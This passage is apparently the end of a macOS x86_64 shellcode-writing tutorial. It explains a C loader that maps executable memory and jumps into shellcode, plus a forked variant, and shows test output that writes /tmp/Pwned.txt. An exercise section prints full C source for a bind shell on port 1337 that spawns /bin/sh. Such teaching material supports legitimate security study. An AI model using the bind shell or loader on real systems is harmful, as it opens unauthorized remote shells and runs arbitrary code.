The loader’s job is simple: it stores raw machine-code bytes (the shellcode) in a C unsigned char array, allocates a memory region with execute permission, copies the bytes into that region, casts the region pointer to a function pointer, and then calls it. That direct transfer of control is what lets the program run arbitrary machine code in the address space of the process. Because the shellcode can call execve, _exit, crash, or otherwise change the process state, the loader must be written with the understanding that control might never return to the original C runtime after the call into the shellcode. In the original single-process loader, unsigned char code[] = { ... }; places the bytes in the program’s data segment; size_t len = sizeof(code); computes the number of bytes to map and copy. The program then calls mmap(NULL, len, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_PRIVATE, -1, 0). This requests an anonymous (no-file-back) memory mapping with read, write and execute permissions; NULL lets the kernel choose the address, len is the requested size, and MAP_ANON|MAP_PRIVATE means the mapping is private and not backed by a file. If mmap fails (returns MAP_FAILED) the loader prints the error and exits. After a successful mapping the loader uses memcpy(exec, code, len) to place the shellcode bytes into the mapped pages, then casts the void * returned by mmap to a function pointer (int (*func)() = (int(*)())exec;) and calls func(). Casting a data pointer to a code pointer and invoking it is implementation-defined in the C standard, but is the de‑facto technique used on POSIX systems for this purpose. What can happen when the call to func() executes depends entirely on what the shellcode does. If the shellcode is written to return cleanly it will restore registers and the stack appropriately and the loader continues execution after the call. If the shellcode invokes execve() successfully, the kernel replaces the entire process image with a new program, so none of the loader’s code after the call executes. If the shellcode calls _exit() or the process receives a fatal signal (segfault, illegal instruction), the process terminates and again no post-call statements run. Shellcode that corrupts the stack or registers without restoring them will also produce undefined behavior in the loader when control returns. In short: seeing only the pre-exec print usually means the shellcode either replaced or terminated the process or crashed it before your post-exec prints could run. A forked-loader variant is useful because it isolates the untrusted shellcode in a child process while the parent remains alive to observe results. When the program fork(), the child repeats the mapping, copy and invocation of the shellcode; any execve or _exit inside the child affects only the child. The parent calls waitpid(child, &status, 0) to get the child’s exit status and can report whether the child exited normally, was killed by a signal, or returned a particular code. The parent can also check for side-effects such as files written by the child (for example /tmp/Pwned.txt) and print reliable diagnostics. This pattern is ideal for debugging shellcode that tends to replace or terminate its host process — the parent becomes the stable observer.
- Compile and Test the shellcode with the loader
zeyadazima.com% clang -o cloader cloader.c
zeyadazima.com% ./cloader
[parent 29373] spawned child 29374, waiting...
[child 29374] executing shellcode (93 bytes)...
[parent] child exited with status 0
[parent] Success: '/tmp/Pwned.txt' exists.
As we can see our shellcode executed successfully with no issues.
Exercises
If you want to dive deeper more, you can do this exercise which is involving in creating a BindShell shellcode and execute it.
Here all the things you need for the excersice:
- BindShell
Ccode
// Source - https://stackoverflow.com/q
// Posted by gatorface, modified by community. See post 'Timeline' for change history
// Retrieved 2025-11-10, License - CC BY-SA 3.0
// Author: Julien Ahrens (@MrTuxracer)
// Website: http://www.rcesecurity.com
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main(void)
{
int i; // used for dup2 later
int sockfd; // socket file descriptor
int clientfd; // client file descriptor
socklen_t socklen; // socket-length for new connections
struct sockaddr_in srv_addr; // server aka listen address
struct sockaddr_in cli_addr; // client address
srv_addr.sin_family = AF_INET; // server socket type address family = internet protocol address
srv_addr.sin_port = htons( 1337 ); // server port, converted to network byte order
srv_addr.sin_addr.s_addr = htonl (INADDR_ANY); // listen on any address, converted to network byte order
// create new TCP socket
sockfd = socket(2, 1, 0);
// bind socket
bind( sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr) );
// listen on socket
listen(sockfd, 0);
// accept new connections
socklen = sizeof(cli_addr);
clientfd = accept(sockfd, (struct sockaddr *)&cli_addr, &socklen );
// dup2-loop to redirect stdin(0), stdout(1) and stderr(2)
for(i = 0; i <= 2; i++)
dup2(clientfd, i);
// magic
// execve( "/bin/sh", NULL, NULL );
//UPDATE: fixed exec call, shell still not returned to
// client connecting with execl or proper execve
execl("/bin/sh", "/bin/sh", (char *)NULL);
}
Tasks:
- Use
execve()instead ofexecl - Collect the syscall for
socket,bind,listen,acceptanddup2. As you will use it to build yourBindShell. - Study the functions arguments and get it ready for the functions/syscalls
- Make sure to go around with the
struct, Cause it’s similler to the way we built arrays - Make sure to use the kernel source code to hop-around to find a variable value, like the
#define AF_INETfor example and explore the source code to help you creating your shellcode.
Help ?
If you got any questions or need help, You can contact me:
- Twitter/X
- Email: contact@zeyadazima.com
- Discord:
.killer_1337including.
Conclusion
We explored the fundamentals of writing shellcode on macOS for the x86_64 architecture. We set up a proper lab environment, understood the XNU kernel and its syscall classes, and clarified calling conventions and register usage crucial for crafting shellcode. By following a structured workflow—starting from C code, identifying syscalls, converting to assembly, and handling arguments—we successfully created shellcodes for printing text, terminating processes, and executing commands. Through these examples, we demonstrated practical techniques such as handling arguments on the stack, using position-independent code, and correctly invoking syscalls in the BSD subsystem of macOS. This foundation sets the stage for more advanced topics.
References
- https://codebrowser.dev/
- https://man.freebsd.org/
- https://pubs.opengroup.org
- https://man7.org/linux/man-pages/
- https://opensource.apple.com/releases/
- https://github.com/apple-oss-distributions/xnu
- https://xcodereleases.com
- https://newosxbook.com